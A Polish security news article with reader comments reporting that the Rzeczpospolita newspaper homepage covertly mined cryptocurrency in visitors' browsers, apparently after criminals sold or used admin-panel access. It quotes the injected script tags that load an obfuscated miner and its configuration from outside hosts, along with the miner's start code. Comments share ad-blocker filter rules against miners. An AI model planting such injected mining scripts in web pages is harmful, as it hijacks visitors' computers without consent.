szukaj

11.01.2018 | 15:09

avatar

Adam Haertle

Nawet główna strona Rzeczpospolitej kopie kryptowaluty na Waszych komputerach

Od kilku miesięcy wiele popularnych witryn internetowych jest przyłapywanych na kopaniu kryptowalut na komputerach gości. Niektóre skrypty instalują same, niektórym najwyraźniej pomagają przestępcy.

Dzisiaj do grona witryn nadużywających zasobów komputerów je odwiedzających dołącza strona główna Rzeczpospolitej. Choć sytuacja finansowa wydawnictw prasowych nie jest łatwa, to raczej podejrzewamy tutaj działanie przestępców.

Alert na Twitterze i ESET w akcji

Maja Niedźwiecka poinformowała na Twitterze, że jej ESET przyłapał witrynę Rzeczpospolitej na kopaniu kryptowaluty – prawdopodobnie Monero.

https://twitter.com/MajaNiedzwiecka/status/951441873029214209

Sprawdziliśmy – faktycznie, każda przeglądarka odwiedzająca stronę Rzeczpospolitej otrzymuje nadal polecenie uruchomienia skryptu kopiącego kryptowaluty. Fragment strony wygląda tak:

<script src="https://www.webassembly.stream/0ppS.js"></script><script src="https://pastebin.com/raw/vf427gKs"></script>

i znajduje się w pobliżu stopki serwisu. Pierwsza część kodu pobiera zaciemnionego minera, druga to jego konfiguracja.

var miner = new Client.Anonymous('cabf0512bc5e1173a7a52df989519fbdbe9111562604d6ba56ac255cba853b4f', {
        throttle: 0.8
    });
    miner.start();

Przestępcy mieli tyle przyzwoitości, że przynajmniej ograniczyli moc kopania do 0,8 domyślnej, dzięki czemu proces nie zjada całej mocy procesora.

Dostęp przez panel administratora?

Co ciekawe, ponad tydzień temu otrzymaliśmy informację, że na forum Cebulka pojawiła się interesująca oferta sprzedaży dostępu.

Ktoś sprzedawał dostęp do panelu zarządzania serwisem dużej polskiej gazety. W późniejszych wpisach wspominał o ponad 7 milionach wizyt miesięcznie. Pasuje do do danych z serwisu SimilarWeb opisujących stronę rp.pl:

Oferta na początku opiewała na 1 BTC (ok. 50 tysięcy złotych), potem połowę tej kwoty, aż w końcu już tylko ok. 15 tysięcy złotych. Co ciekawe, nasz informator napisał nam tak:

jak nie sprzeda bedzie kopal krypto

To może oznaczać, że sprzedawca nie otrzymał satysfakcjonującej go oferty i sam postanowił inaczej spożytkować swój dostęp. Mamy nadzieję, że administratorzy Rzeczspopolitej skrypt szybko usuną i poprawią błędy, dzięki którym przestępcy dostali się do panelu administratora.

Powrót

Komentarze

  • avatar
    2018.01.11 15:27 Hiena

    To ich nowy paywall :D

    Odpowiedz
  • avatar
    2018.01.11 15:36 rav

    Ciągle jest :)

    Odpowiedz
  • avatar
    2018.01.11 15:49 Grech

    Jest może jakiś dodatek do FF który będzie ostrzegał że dana strona kopie kryptowaluty?

    Odpowiedz
    • avatar
      2018.01.11 15:55 Adam

      ESET ;)

      Odpowiedz
      • avatar
        2018.01.11 16:04 Wojak

        Wspaniała odpowiedź, przyda się super wszystkim którzy nie używają cuckdowsa.

        Admin za tą odpowiedź godną pewnego forum o elektronice powinien siedzieć z pół godziny na karnym jeżyku :/

        Odpowiedz
        • avatar
          2018.01.11 17:40 Chesteroni

          Reset jest nie tylko na Windows

          Odpowiedz
        • avatar
          2018.01.11 18:56 rfgs

          >nieironiczne użycie słowa 'cuck’

          Odpowiedz
      • avatar
        2018.01.13 23:13 Xenin

        Zdecydowanie nie Eset, a Emsisoft. ;-)

        Odpowiedz
    • avatar
      2018.01.11 16:53 anon001

      uBlock + uMatrix, może nie powiadamiają ale przynajmniej blokują

      Odpowiedz
    • avatar
      2018.01.11 17:03 Artur

      uBlock to blokuje. A skryptu już chyba nie ma :)

      Odpowiedz
    • avatar
      2018.01.11 17:49 Tomek

      uBlock – mozesz sobie dodac wpis np. https://coin-hive.com/lib/coinhive.min.js itp.

      Odpowiedz
      • avatar
        2018.01.11 18:36 miroth

        Nie trzeba dodawać tego wpisu bo jest on w filtrze Resource abuse który jest domyślnie włączony​​​​​, co najwyżej można dodać ||www.webassembly.stream^$third-party bo jeszcze go nie dodano.

        Odpowiedz
    • avatar
      2018.01.12 20:51 hoek

      uBlock Origin plus odpowiednia lista https://github.com/hoshsadiq/adblock-nocoin-list/

      Odpowiedz
  • avatar
    2018.01.11 16:03 Wojak

    Ale ten no odblokujcie reklamy i zewnętrzne żądania xD

    Odpowiedz
  • avatar
    2018.01.11 18:08 czesław

    Z ciekawości wszedłem na rp.pl
    Nie widzę skryptu do kopania, ale za to masę innych skryptów śledzących, reklamowych i innego badziewia. Umatrix świeci się na czerwono jak choinka

    Odpowiedz
    • avatar
      2018.01.11 18:31 Artur

      Tak jest na wielu portalach ;) U mnie zablokowanych elementów zawsze jest przynajkniej kilkadziesiąt. Nie pamiętam pisze teraz z telefonu :/

      Odpowiedz
  • avatar
    2018.01.11 20:43 Dj

    Nie zauważyłem kopania krypto na Rzepie. Czytam ją na tablecie ze słabiutkim Atomem i nie ma raczej opcji żeby kopało. Przynajmniej nigdy nie zauważyłem monitu nadmiernego użycia zasobów. W sumie to przy takim procku nie dałoby się w ogóle korzystać ze strony. Czyli chyba fałszywy alarm.

    Odpowiedz
    • avatar
      2018.01.11 23:06 Emce

      Nie ma całego skryptu ale może on być nieaktywny jak na stronę wchodzi się z urządzeń mobilnych.

      Odpowiedz
      • avatar
        2018.01.11 23:47 Dj

        Akurat to jest wątpliwe. Wszystkie inne skrypty koparek na stronach kopały i nie było problemu. Zwłaszcza, że mam na nim pełnego Windowsa i tym samym skrypty widzą go jako stacjonarny sprzęt.

        Odpowiedz
        • avatar
          2018.01.12 09:18 dremathi

          Skrypt był tylko przez parę godzin, po 18 był już usunięty.
          Minera można skonfigurować tak ze jak wykryje UE mobilnego urządzenia, to się nie uruchomi https://i.imgur.com/YKQ84qi.png albo można pokazać komunikat z zapytaniem czy ma się uruchomić koparka https://i.imgur.com/DXCWImb.png i tak te wszystkie skrypty kopiące powinny funkcjonować od początku. Może to by była jakaś alternatywa do reklam, a tak janusze prowadzenia stron udupili już taką możliwość, bo ludzie nie lubią jak im coś się dzieje z komputerem bez ich wiedzy i teraz nawet te z zapytaniem czy uruchomić koparkę będą blokować.

          Odpowiedz
  • avatar
    2018.01.12 10:01 krzych

    Dziś o o 8:48 natrafiliśmy na kolejny alert w ESET na stronie Rzeczpospolitej. Tym razem jest to Scrlnject.B pytanie tylko czy to przypadkiem tym razem nie jest fałszywy alarm jak
    https://zaufanatrzeciastrona.pl/post/eset-troche-zwariowal/

    Odpowiedz
    • avatar
      2018.01.12 10:12 Adam

      Może być z cache przeglądarki wczytane.

      Odpowiedz
      • avatar
        2018.01.12 11:23 krzych

        Wczorajsze ładowanie skryptu zostało zabite przez firewall a dziś własnie ten alert i masz racje leży to w cache i przyczepił się praktycznie do wszystkich plików które są w cache.

        Odpowiedz
  • avatar
    2018.01.14 01:55 it

    Po przejeciu goscia wdrozono system rekrutacji.

    Odpowiedz

Zostaw odpowiedź

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Nawet główna strona Rzeczpospolitej kopie kryptowaluty na Waszych komputerach

Komentarze